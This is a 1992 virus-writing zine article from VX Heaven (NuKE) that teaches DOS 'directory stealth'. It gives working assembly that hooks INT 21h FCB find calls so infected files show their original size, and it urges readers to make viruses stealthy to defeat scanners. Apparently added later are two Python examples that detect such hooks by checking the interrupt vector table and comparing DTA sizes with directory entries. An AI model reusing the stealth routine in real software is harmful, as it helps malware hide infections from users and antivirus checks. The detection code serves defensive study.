VX Heaven


Directory Stealth

Rock Steady
Nuke Info Journal [4]
August 1992


Stealth viruses are the viruses that, I must admit, the anti-virus people do not like at all. Imagine adding a polymorphic feature to a stealth virus! But if you want to continue writing viruses, you have to make them stealth. MS-DOS version 6.0 now comes with a virus scanner and CRC/checksum checkers in order to stop many viruses, but it will NEVER stop a `stealth' virus that is SMART about those AV features!

People think that there are A LOT more INFECTED PCs since the virus threat started in 1986-87. Even though in the beginning only 10 or so viruses were known, they infected more systems compared to the viruses of today, where we have about 1300 and growing. But the truth is that FEWER PCs are getting infected now, as people are virus-aware. With all the utilities out there, any joker can stop and clean a virus in seconds. Come on, how many people have MEMORIZED the size of COMMAND.COM? Off the top of my head it is 47845 bytes (MS-DOS V5.0). A simple increase in size tells me I have a problem.

A simple stealth feature every virus MUST have is the DOS `DIR' stealth feature, which does NOT show you the INCREASE in file size when the virus infects a file. I have played with a few such routines. I have tried reducing the file size in the FAT area, which results in the famous CHKDSK error reports of lost sectors or cross-linked files, and fixing them with CHKDSK damages the file for good.

What can we do? How about reducing the file size right AFTER it is read by DOS or any utility and right BEFORE it is displayed on the screen! Yeah, that's an idea. Here's how to go about it...

Theory

First we must HOOK Int 21h, as every time a `DIR' is done, Int 21h functions 11h and 12h are called! If you don't know how to hook interrupts, read the RESIDENT VIRII article in this newsletter.

   Int21_Handler:
          cmp     ah,11h                  ;Is a DOS `Dir' being done?
          je      dir_stealth             ;Yes, Jump to `DIR_STEALTH'
          cmp     ah,12h                  ;Is a DOS `Dir' Being done?
          je      dir_stealth             ;Yes, Jump to `DIR_STEALTH'

  Int21Call:
          jmp     dword ptr cs:[Int21]    ;Or Else Goto ORIGINAL Int 21h
          ret                             ;Is need for the CALL of below

That's all that is needed in your Int21_Handler. Of course, if you are infecting files that are being executed, you add that check ABOVE! Anyhow, let's explain `DIR_STEALTH'.
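As an added defender-side example (not part of the original article, and not code from NuKE): the handler above works by replacing the INT 21h vector, so the simplest way to notice it is to compare the real-mode interrupt vector table (IVT) with a baseline recorded at a known-clean boot. The two IVT images, the "DOS kernel" and "resident hook" segment values and the top-of-DOS boundary below are all constructed for illustration; Python is used because the check reads and tests more easily than assembly.

```python
"""Spot a hooked INT 21h by diffing a snapshot of the real-mode interrupt
vector table (IVT) against a baseline recorded from a known-clean boot.

Both IVT images are constructed for this example. On a real DOS machine the
1 KB table sits at linear address 0 and each vector is stored as a
little-endian offset word followed by a segment word; the segment values
labelled "illustrative" are not measured from any system.
"""
import struct

IVT_SIZE = 256 * 4
INT_DOS = 0x21


def vector(ivt, intno):
    """Return (segment, offset) of interrupt `intno` from an IVT image."""
    off, seg = struct.unpack_from("<HH", ivt, intno * 4)
    return seg, off


def linear(seg, off):
    """Real-mode segment:offset to a 20-bit linear address."""
    return ((seg << 4) + off) & 0xFFFFF


def set_vector(ivt, intno, seg, off):
    """Return a copy of an IVT image with one vector replaced (only used here
    to build the constructed snapshots)."""
    buf = bytearray(ivt)
    struct.pack_into("<HH", buf, intno * 4, off, seg)
    return bytes(buf)


def changed_vectors(baseline, current):
    """Interrupt numbers whose vectors differ between the two snapshots."""
    return [n for n in range(256) if vector(baseline, n) != vector(current, n)]


def suspicious_hooks(baseline, current, dos_top_linear):
    """Changed vectors whose new handler lies above the memory DOS occupied at
    baseline time, i.e. inside something that went resident afterwards.
    Returns [(intno, (seg, off)), ...]. A legitimate TSR trips this too: the
    point is to make the change visible, not to classify it."""
    hits = []
    for n in changed_vectors(baseline, current):
        seg, off = vector(current, n)
        if linear(seg, off) > dos_top_linear:
            hits.append((n, (seg, off)))
    return hits


# Constructed baseline: every vector parked at a dummy BIOS handler, with
# INT 21h pointing into an illustrative DOS kernel segment.
BIOS_DUMMY = (0xF000, 0xFF53)           # illustrative (seg, off)
DOS_KERNEL_INT21 = (0x0116, 0x109E)     # illustrative (seg, off)
DOS_TOP_LINEAR = linear(0x1000, 0)      # illustrative top of DOS at clean boot

BASELINE_IVT = set_vector(struct.pack("<HH", BIOS_DUMMY[1], BIOS_DUMMY[0]) * 256,
                          INT_DOS, *DOS_KERNEL_INT21)
# Constructed "after infection" snapshot: INT 21h now points high in memory,
# where a handler like Int21_Handler would sit once resident.
HOOKED_IVT = set_vector(BASELINE_IVT, INT_DOS, 0x9F00, 0x0103)

if __name__ == "__main__":
    for intno, (seg, off) in suspicious_hooks(BASELINE_IVT, HOOKED_IVT, DOS_TOP_LINEAR):
        old_seg, old_off = vector(BASELINE_IVT, intno)
        print(f"INT {intno:02X}h now at {seg:04X}:{off:04X} (was {old_seg:04X}:{old_off:04X})")
```

Because the handler passes control on through `jmp dword ptr cs:[Int21]`, the original vector survives inside the resident code, which is why a checker that records the vector at clean boot and re-reads it later still sees the change even when the hook is otherwise transparent to DIR. Legitimate TSRs change vectors too, so a hit is a change to explain, not a verdict.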

Offset  Size  Description
Normal FCB
00h     1     Drive number: 00=current drive, 01=A, 02=B, 03=C, etc.
01h     8     Filename; unused positions padded with blanks
09h     3     Extension of filename
0Ch     2     Current block (points to block of records)
0Eh     2     Record size
10h     4     File size in bytes (low-order word first, then high-order)
14h     2     Date of last write: YY-MM-DD packed into bits YYYY-YYYM-MMMD-DDDD
16h     2     Time of last write: HH:MM:SS packed into bits HHHH-HMMM-MMMS-SSSS
18h     4     Reserved
*1Ch    4     Same as `10h', but THIS file size is the one that gets printed on screen!
20h     1     Offset of current record
21h     4     Relative record
Extended FCB
-07h    1     ALWAYS FFh; tells us this is an extended FCB
-06h    5     Reserved for DOS
-01h    1     Attribute byte

* = Field changed by the virus.

Extended FCBs are identical to the normal FCB, but have three new fields totalling 7 bytes (that is why we add 7 to BX). The additional 7 bytes are added to the BEGINNING!

So if we have an extended FCB the first byte will be FFh: simply INC it, and if the result is ZERO you have an extended FCB! You can also CMP ES:[BX],FFh, but that takes too many bytes. Be COMPACT!!!

Algorithms

CONDITION: After calling function 11h/12h (Int 21h), DOS searches using the contents of the FCB (e.g. *.*) that DS:DX points to. If successful, it DUPLICATES the matching entry into the current DTA (Disk Transfer Area), and basically we will EDIT the info in the DTA!

NOTE: Just because we are using the DTA doesn't mean this will work for functions 4Eh/4Fh (Int 21h), which use the DTA and ASCIIZ strings to search; that is a different procedure, though somewhat similar to this one. See Method #2 for that.

Step 1. We call Int 21h ourselves so we have the results to play with BEFORE DOS displays them on screen.

Step 2. Get the current PSP, as the FCB is located inside the PSP. In COM files it is at CS:0000 - CS:00FF, but in EXEs it can be anywhere; Int 21h/AH=51h (undocumented) will find it for us.

Step 3. Unmask the seconds field (to see if the file is infected). Quit if NOT.

Step 4. Get the current DTA.

Step 5. Test whether it is an extended or a normal FCB! If extended, simply add 7h to the address (as extended FCBs only have 7 extra bytes at the beginning).

Step 6. Subtract the virus size from the file size in the DTA, and restore the time field.

 ; Here it is... Method #1

   dir_stealth:
          pushf                   ;Fake an INT Call
          push    cs              ;Needed to return back HERE! (Virus)
          call    Int21Call       ;Call the interrupt (See `Int21_Handler')
          test    al,al           ;AL=00h if successful
          jnz     no_good         ;Not Successful. Errors Eg:No More Files

          push    ax
          push    bx      ;Save them since they will be used! So when
          push    es      ;We exit all is restored to as Before!
          mov     ah,51h  ;(Undocumented) Gets the Current PSP and puts
          int     21h     ;it into BX

          mov     es,bx         ;ES now has PSP segment Address
          cmp     bx,es:[16h]   ;Did we open a Good PSP?
          jnz     exit_man      ;No, PSP unavailable, Exit Dude
          mov     bx,dx         ;BX now points to the Original FCB in PSP
          mov     al,[bx]       ;AL now has the current drive
          push    ax            ;Save it to tell if its an Extended FCB
          mov     ah,2fh        ;Get DTA (Disk Transfer Address)
          int     21h
  ;Also before we start fiddling around we must know if we are working with
  ;an EXTENDED FCB or the Normal FCB, or else Major Problems! The Extended
  ;has three fields prepended to the normal one... (see the table above)

          pop     ax            ; AL = FFh if Extended FCB or else Drive #
          inc     al            ; Will tell us if we have an Extended FCB
          jnz     fcb_ok        ; No, We don't continue as normal
          add     bx,7h         ; Yes, we do, add 7h to BX pointer
  fcb_ok: mov     ax,es:[bx+17h]  ;Gets Seconds Field
          and     ax,1fh          ;Unmask to have SECONDS only
          xor     al,1dh          ;is it 58 seconds? (1d * 2)
          jnz     not_infected    ;Nope, okay its not infected
          and     byte ptr es:[bx+17h],0e0h   ;Restores seconds
          sub     es:[bx+1dh],virus_size      ;Subtract FileSize with Virii
          sbb     es:[bx+1fh],ax              ;Needed to fix up Bytes with
  not_infected:                               ;Borrowing
          pop     es              ;Ciao, Ciao
          pop     bx
          pop     ax
  no_good:iret             ;Pretend you came back from an Interrupt call!
  ;----------------------------The EnD-------------------------------------
                          Rock Steady / NuKE
                 `Feed my Frankenstein', Alice Cooper

NOTE: This code works; look at NuKE PoX V1.1 to see it...
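As an added example written from the defender's side (it is neither the article's nor NuKE PoX's code): a Python decoder for the record that AH=11h/12h leaves in the DTA, covering both the normal and the extended FCB layouts from the table above, followed by the two checks an integrity tool would run on it: a cross-view comparison of the size DOS reports against the directory entry read independently of Int 21h (the "memorized COMMAND.COM size" idea done mechanically), and a scan for the seconds==58 marker that Step 3 and the `xor al,1dh` test depend on. Every byte string, the 1000-byte parasite size and the timestamps are constructed for the example. One detail the table glosses over: in the DTA the copied 32-byte directory entry is preceded by a drive byte, which is why Method #1 reads the time at +17h and the size at +1Dh rather than at the entry's own 16h and 1Ch.

```python
"""Decode the record that FCB Find First / Find Next (INT 21h, AH=11h/12h)
leaves in the DTA and run two defender-side checks on it: a cross-view size
comparison against the on-disk directory entry, and a scan for the
seconds == 58 timestamp marker. All byte strings here are constructed."""
import struct

EXT_FCB_MARK = 0xFF     # first byte of an extended FCB / extended DTA record
EXT_FCB_PREFIX = 7      # FFh marker + 5 reserved bytes + attribute byte
DRIVE_BYTE = 1          # DOS stores a drive number ahead of the copied entry
ENTRY_SIZE = 32
STEALTH_MARKER_SECONDS = 58   # 1Dh * 2, the value the article's routine tests for


def pack_dos_time(h, m, s):
    """HH:MM:SS into the DOS bit layout HHHHH MMMMMM SSSSS (seconds stored / 2)."""
    return (h << 11) | (m << 5) | (s // 2)


def pack_dos_date(y, m, d):
    """Date into the DOS bit layout YYYYYYY MMMM DDDDD (year relative to 1980)."""
    return ((y - 1980) << 9) | (m << 5) | d


def decode_dos_time(t):
    return (t >> 11) & 0x1F, (t >> 5) & 0x3F, (t & 0x1F) * 2


def decode_dos_date(d):
    return 1980 + ((d >> 9) & 0x7F), (d >> 5) & 0x0F, d & 0x1F


def build_dir_entry(name, ext, size, time, date, attr=0x20):
    """Constructed 32-byte FAT directory entry: name, ext, attribute, 10 reserved
    bytes, then time at 16h, date at 18h, first cluster at 1Ah, size at 1Ch."""
    head = name.ljust(8).encode("ascii") + ext.ljust(3).encode("ascii")
    return head + bytes([attr]) + bytes(10) + struct.pack("<HHHI", time, date, 0, size)


def build_dta_record(entry, drive=3, extended=False, attr=0):
    """Constructed DTA contents as left by AH=11h/12h: optional 7-byte extended
    prefix, then the drive byte, then the copied directory entry."""
    prefix = bytes([EXT_FCB_MARK]) + bytes(5) + bytes([attr]) if extended else b""
    return prefix + bytes([drive]) + entry


def parse_dta_record(dta):
    """Return the fields of a DTA record, handling both FCB flavours."""
    off = EXT_FCB_PREFIX if dta[0] == EXT_FCB_MARK else 0   # same test as `inc al'
    entry = dta[off + DRIVE_BYTE: off + DRIVE_BYTE + ENTRY_SIZE]
    if len(entry) != ENTRY_SIZE:
        raise ValueError("DTA record is too short for a directory entry")
    name = entry[0:8].decode("ascii").rstrip()
    ext = entry[8:11].decode("ascii").rstrip()
    time, date, _cluster, size = struct.unpack_from("<HHHI", entry, 0x16)
    return {
        "extended": off != 0,
        "name": f"{name}.{ext}" if ext else name,
        "attr": entry[0x0B],
        "time": decode_dos_time(time),
        "date": decode_dos_date(date),
        "size": size,
    }


def check_views(displayed_dta, on_disk_entry):
    """Cross-view check: compare what DOS handed the caller (possibly through a
    hooked INT 21h) with the raw directory entry obtained without going through
    DOS. Returns a list of (finding, detail) tuples; empty means the views agree."""
    shown = parse_dta_record(displayed_dta)
    disk = parse_dta_record(bytes([0]) + on_disk_entry)   # drive byte 0 = current
    findings = []
    if shown["size"] != disk["size"]:
        findings.append(("size_mismatch",
                         f"{shown['name']}: DIR shows {shown['size']}, entry holds {disk['size']}"))
    if shown["time"] != disk["time"]:
        findings.append(("time_mismatch",
                         f"{shown['name']}: DIR shows {shown['time']}, entry holds {disk['time']}"))
    if disk["time"][2] == STEALTH_MARKER_SECONDS:
        findings.append(("marker", f"{shown['name']}: seconds field is {STEALTH_MARKER_SECONDS}"))
    return findings


# Constructed sample: COMMAND.COM as stored on disk after a hypothetical
# 1000-byte parasite attached itself (size grown, seconds set to 58), and the
# same entry as a DIR-stealth hook would present it (original size, seconds zeroed).
ON_DISK_ENTRY = build_dir_entry("COMMAND", "COM", 48845,
                                pack_dos_time(9, 0, 58), pack_dos_date(1992, 8, 1))
DISPLAYED_ENTRY = build_dir_entry("COMMAND", "COM", 47845,
                                  pack_dos_time(9, 0, 0), pack_dos_date(1992, 8, 1))
DISPLAYED_DTA = build_dta_record(DISPLAYED_ENTRY)
DISPLAYED_DTA_EXT = build_dta_record(DISPLAYED_ENTRY, extended=True, attr=0x20)

if __name__ == "__main__":
    for kind, detail in check_views(DISPLAYED_DTA, ON_DISK_ENTRY):
        print(f"[{kind}] {detail}")
```

The cross-view comparison is the part that matters: a stealth hook can only edit what flows through the interrupt it owns, so a checker that reads the directory entry by another path (raw sector reads, or a size and checksum baseline recorded from a clean boot) sees the discrepancy. The marker scan is cheap but specific to this one routine; the size and time mismatches generalize to any DIR-stealth technique.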
